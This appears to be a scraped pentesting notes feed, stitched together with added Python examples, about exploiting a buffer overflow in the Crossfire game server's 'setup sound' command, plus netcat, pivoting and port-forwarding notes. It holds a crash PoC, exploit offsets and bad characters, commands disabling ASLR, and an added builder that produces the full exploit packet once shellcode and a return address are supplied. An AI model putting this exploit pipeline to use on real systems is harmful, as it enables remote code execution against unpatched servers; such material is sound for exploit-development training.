Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 10:11:46

#!/usr/bin/env python3
import socket

host = "127.0.0.1"

# 4379 bytes of 'A' (0x41) overrun the buffer behind the "setup sound" command
crash = b"\x41" * 4379

# Crossfire "setup sound" command with the overlong argument, framed the way
# the server expects it (leading \x11( and trailing \x90\x00#)
buffer = b"\x11(setup sound " + crash + b"\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("[*] Sending evil buffer...")
s.connect((host, 13327))
s.sendall(buffer)
data = s.recv(1024)
print(data)
...


Score: 0
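The PoC above only proves the crash; the next step is finding which bytes of the 4379 land in EIP. The following is an added example (not code from the note) that reimplements the familiar cyclic-pattern trick behind Metasploit's pattern_create / pattern_offset, so the offset can be found without the external tool. The 4379-byte length and the "setup sound" framing are taken from the PoC; the EIP value used in the walk-through is constructed.

```python
#!/usr/bin/env python3
"""Cyclic-pattern helper for turning the crash above into an EIP offset.

Added example, not code from the original note. The pattern is the usual
Upper-lower-digit triplet sequence (Aa0Aa1Aa2...), which never repeats a
4-byte window within its first 20280 bytes, so the dword found in EIP maps
to exactly one position in the buffer."""
import string
import struct

PREFIX = b"\x11(setup sound "   # framing from the PoC above
SUFFIX = b"\x90\x00#"


def pattern_create(length):
    """Return `length` bytes of the non-repeating sequence Aa0Aa1...Aa9Ab0..."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern longer than 20280 bytes would start repeating")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, length=4379):
    """Map the value the debugger shows in EIP back to its offset in the pattern.

    `eip_value` is an int (e.g. 0x41336141). x86 is little-endian, so the bytes
    that overwrote the saved return address appear reversed in the register;
    struct.pack("<I") restores their in-memory order before searching.
    Returns -1 if the dword is not from the pattern (EIP was not overwritten by
    this buffer, or the pattern was too short)."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def build_probe(total=4379):
    """The PoC's buffer with a cyclic pattern in place of the 'A's."""
    return PREFIX + pattern_create(total) + SUFFIX


if __name__ == "__main__":
    # Constructed walk-through: pretend the debugger reported EIP = 0x41336141.
    probe = build_probe()
    print(f"probe is {len(probe)} bytes")
    print("offset of 0x41336141:", pattern_offset(0x41336141))
```

Send build_probe() in place of the all-'A' buffer, read EIP in the debugger, and feed it to pattern_offset; a result of -1 means EIP was not hit by the pattern and the crash needs a second look.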


#!/usr/bin/env ruby

=begin
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
=end

require 'socket'

#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"

#add eax, 12 = 83C00C
#jmp eax = FFE0


#create shellcode
#creates a bi...


Score: 0
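The numbers in the Ruby note (total size 4379, EIP at offset 4368, bad chars 00 0a 0d 20, first stage add eax,12 / jmp eax) fix the layout of the final packet. The following is an added example, not the note's exploit, that lays the buffer out from those values and refuses to build a packet that would be truncated or mangled. The return address and the shellcode are placeholders (assumptions for the demo): a real run needs the address of a jmp/call esp-style gadget from the target binary and shellcode that avoids the listed bad characters.

```python
#!/usr/bin/env python3
"""Lay out the Crossfire 'setup sound' exploit buffer from the note's numbers.

Added example, not the note's Ruby code. Constants come from the note; the
gadget address and shellcode passed to build_exploit are the caller's."""
import struct

TOTAL = 4379                    # bytes between the command prefix and suffix
OFFSET = 4368                   # bytes before the saved return address
BADCHARS = b"\x00\x0a\x0d\x20"  # from the note
FIRST_STAGE = b"\x83\xc0\x0c" + b"\xff\xe0"   # add eax, 12 ; jmp eax (from the note)
PREFIX = b"\x11(setup sound "   # same framing as the crash PoC
SUFFIX = b"\x90\x00#"


def find_badchars(data, badchars=BADCHARS):
    """Return the sorted list of bad byte values present in `data`."""
    return sorted({b for b in data if b in badchars})


def build_exploit(ret_addr, shellcode):
    """Build the packet: [shellcode][NOP pad][EIP][first stage][NOP pad].

    After the ret, ESP points just past the overwritten return address, i.e.
    at FIRST_STAGE. That stub adds 12 to EAX and jumps there, so it expects
    EAX to point 12 bytes before the shellcode at crash time; that is
    something to confirm in the debugger, not assume. Raises ValueError
    rather than producing a packet the target would truncate or mangle."""
    eip = struct.pack("<I", ret_addr)
    for name, blob in (("return address", eip), ("shellcode", shellcode)):
        bad = find_badchars(blob)
        if bad:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in bad]}")
    if len(shellcode) > OFFSET:
        raise ValueError(f"shellcode ({len(shellcode)} bytes) exceeds {OFFSET}")
    tail_room = TOTAL - OFFSET - len(eip)      # 7 bytes after EIP
    if len(FIRST_STAGE) > tail_room:
        raise ValueError("first stage does not fit after EIP")
    body = shellcode + b"\x90" * (OFFSET - len(shellcode))
    body += eip + FIRST_STAGE + b"\x90" * (tail_room - len(FIRST_STAGE))
    assert len(body) == TOTAL
    return PREFIX + body + SUFFIX


if __name__ == "__main__":
    # Hypothetical gadget address and an INT3 sled standing in for shellcode;
    # neither comes from the note. 0xDEADBEEF is only a badchar-free filler,
    # and the INT3 sled is a debugger check that control reaches the buffer.
    pkt = build_exploit(0xDEADBEEF, b"\xcc" * 32)
    at = len(PREFIX) + OFFSET
    print(f"{len(pkt)} bytes, EIP bytes at {at}: {pkt[at:at + 4].hex()}")
```

Swapping the INT3 sled for real shellcode and the filler for the gadget address found in the debugger is the only change needed; find_badchars will flag any encoding that still contains one of the four bad bytes.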


cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
ulimit -c unlimited
ulimit -c...


Score: 0

By: ajayverma 2019-06-25 10:11:58

badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" +
"\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a" +
"\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4...


Score: 0
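The string above is the first probe of the bad-character loop: send every byte value, compare the copy in memory with what was sent, exclude the first byte that breaks, repeat. The following is an added example (not the note's code) that generates that probe and runs the loop. fake_target is a constructed stand-in for "send it and read the dump in the debugger", built to mangle exactly the bytes the Crossfire note lists; against a real service it would be replaced by a function that sends the probe and returns the bytes read back from memory.

```python
#!/usr/bin/env python3
"""Bad-character discovery: build the probe and narrow down what the target
mangles. Added example, not the note's own code."""


def badchar_string(exclude=(0x00,)):
    """All 256 byte values in order, minus those already known to be bad.
    Sending them in order makes the first mismatch easy to spot in a dump."""
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, observed):
    """Compare the probe with what landed in memory, position by position.
    Returns the first sent byte that was altered, dropped or caused the copy
    to stop, or None if the copy is intact. Only the first culprit is trusted:
    everything after it may be shifted, so the loop re-sends without it."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def discover_bad_chars(send_and_dump, known=(0x00,), max_rounds=256):
    """Repeat probe/compare until the copy matches; returns all bad bytes."""
    bad = list(known)
    for _ in range(max_rounds):
        probe = badchar_string(bad)
        culprit = first_bad_char(probe, send_and_dump(probe))
        if culprit is None:
            return bytes(sorted(bad))
        bad.append(culprit)
    raise RuntimeError("still finding bad chars after max_rounds")


def fake_target(data):
    """Constructed target that behaves like the note's bad chars 0a/0d/20:
    the copy stops at a newline (0x0a), and CR (0x0d) and space (0x20) come
    back as NUL. 0x00 is excluded from the start, as in the probe above."""
    data = data.split(b"\x0a", 1)[0]
    return data.replace(b"\x0d", b"\x00").replace(b"\x20", b"\x00")


if __name__ == "__main__":
    found = discover_bad_chars(fake_target)
    print("bad chars:", " ".join(f"\\x{b:02x}" for b in found))
```

Each round removes one byte, so a target that mangles four bytes needs four probes plus one clean confirmation; the order in which they are found (0x0a, then 0x0d, then 0x20 here) is simply the order they appear in the probe.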


There are many distributions of Linux, and they all do things a little differently regarding default security and built-in tool sets. This means that when engaging these different flavors during a pentest, what works against one Linux target to get an interactive shell may not work against another. Well, not to worry my friends, there are many technique...


Score: 0


The amazing netcat, used for so many fantastic things. If you're learning the basics of penetration testing, get to know this tool inside out.

Tool:
Netcat


Connect to a TCP port

nc -nv <IP Address> <Port>

Listen on a TCP port

nc -lvp <port>

Connect and receive an HTTP page

nc -nv <IP Address> 80
HEAD / HTTP...


Score: 0
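What the three nc commands above do on the wire, as an added example in Python (not code from the note): serve_once is the `nc -lvp <port>` side, connect_send the `nc -nv <IP> <port>` side, and http_head types the HEAD request by hand. The note is cut off after `HEAD / HTTP`, so the request line `HEAD / HTTP/1.0` is an assumption. The demo talks to its own listener on 127.0.0.1 with a constructed HTTP reply, so it runs offline; pointing http_head at a real host on port 80 grabs a live banner.

```python
#!/usr/bin/env python3
"""Python equivalents of the nc listen / connect / HEAD commands above.
Added example, not part of the original note."""
import socket
import threading


def serve_once(reply, host="127.0.0.1", port=0):
    """nc -lvp: bind, accept one client, record what it sends, answer with
    `reply`, close. port=0 lets the OS pick a free port. Returns
    (bound_port, thread, received); `received` is filled in by the thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]
    received = []

    def handler():
        conn, _peer = srv.accept()
        with conn:
            received.append(conn.recv(4096))
            conn.sendall(reply)
        srv.close()

    thread = threading.Thread(target=handler, daemon=True)
    thread.start()
    return bound_port, thread, received


def connect_send(host, port, payload=b"", timeout=5.0):
    """nc -nv host port with data on stdin: connect, send, then read until the
    remote side closes. The half-close (SHUT_WR) tells the server that no more
    input is coming, which is what lets servers that read to EOF reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def http_head(host, port=80):
    """Banner-grab with HEAD; returns (status line, {header name: value}).
    The exact request line is an assumption (the note is cut off)."""
    request = b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n"
    raw = connect_send(host, port, request)
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


if __name__ == "__main__":
    # Constructed reply standing in for a real web server.
    port, t, got = serve_once(b"HTTP/1.0 200 OK\r\nServer: demo/1.0\r\n\r\n")
    print(http_head("127.0.0.1", port))
    t.join(5)
    print("listener saw:", got[0])
```

The listener side is also the half of this that becomes a catch-all for reverse shells: the same bind/listen/accept with the reply replaced by an interactive loop is all `nc -lvp` is doing.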


Once a meterpreter shell is obtained on a system a larger range of options is available to the Penetration Tester for accessing the system. In a hypothetical scenario the victim is running a vulnerable mail server on port 25, and we have a remote exploit we wish to use against it. Unfortunately for us it’s behind a firewall. After getting a meter...


Score: 0


Port forwarding can be one of the more confusing aspects of pivoting between machines and networks. Both remote and local SSH forwarding can be even more confusing in the sense that it matters who is initiating the connection and who the destination server is. I'll run through local port forwarding here, and in a separate page, cover remote forwardin...


Score: 0


Port forwarding can be one of the more confusing aspects of pivoting between machines and networks. Both remote and local SSH forwarding can be even more confusing in the sense that it matters who is initiating the connection and who the destination server is. I'll run through remote port forwarding here, and in a separate page, cover local forwardin...


Score: 0


SSH is fantastic for port redirection in a lot of cases, but what if you want to set up a redirection of incoming and outgoing ports without the hassle of setting up SSH servers? Rinetd is a great program that will let you do this.

Tool
Rinetd –
[Linux Download] http://www.boutell.com/rinetd/http/rinetd.tar.gz
[Windows Download] http://www...


Score: 0
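The mechanism the three forwarding notes above share (local SSH forwarding, remote SSH forwarding, rinetd) is the same: something listens on a port, and each connection it accepts is wired to a connection it opens to the real destination, with bytes copied both ways until either side closes. The following is an added example of that redirector in Python; it is not rinetd's code, does not read rinetd's config file, and involves no SSH. The target is a constructed echo server on 127.0.0.1 so the demo runs offline.

```python
#!/usr/bin/env python3
"""A minimal rinetd-style TCP port redirector. Added example, not rinetd."""
import socket
import threading


def _listener(host, port, on_client):
    """Bind host:port and hand every accepted socket to on_client in its own
    thread. accept() is polled with a short timeout so stop() can end the
    loop cleanly. Returns (bound_port, stop)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(16)
    srv.settimeout(0.2)
    stop = threading.Event()

    def loop():
        while not stop.is_set():
            try:
                client, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            client.settimeout(None)
            threading.Thread(target=on_client, args=(client,), daemon=True).start()
        srv.close()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1], stop.set


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the far
    end sees the EOF too (protocols that read to EOF depend on this)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(a, b):
    """Run both directions; close both sockets once both have finished."""
    threads = [threading.Thread(target=_pump, args=pair, daemon=True)
               for pair in ((a, b), (b, a))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


def start_redirector(listen_host, listen_port, target_host, target_port):
    """One rinetd-style rule: listen_host:listen_port -> target_host:target_port.
    Returns (bound_port, stop). port 0 lets the OS pick a free port."""
    def on_client(client):
        try:
            upstream = socket.create_connection((target_host, target_port), timeout=5)
        except OSError:
            client.close()            # target unreachable: drop the client
            return
        upstream.settimeout(None)
        _relay(client, upstream)
    return _listener(listen_host, listen_port, on_client)


def start_echo_server(host="127.0.0.1"):
    """Constructed stand-in for the real service behind the redirector."""
    def on_client(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
    return _listener(host, 0, on_client)


def roundtrip(host, port, payload, timeout=5.0):
    """Connect, send payload, half-close, and read everything until EOF."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    echo_port, stop_echo = start_echo_server()
    relay_port, stop_relay = start_redirector("127.0.0.1", 0, "127.0.0.1", echo_port)
    print(roundtrip("127.0.0.1", relay_port, b"hello through the redirector"))
    stop_relay()
    stop_echo()
```

The half-close in _pump is the detail that trips up naive relays: without it, a client that sends its request and then waits for EOF never sees the server's EOF, and the connection hangs instead of finishing.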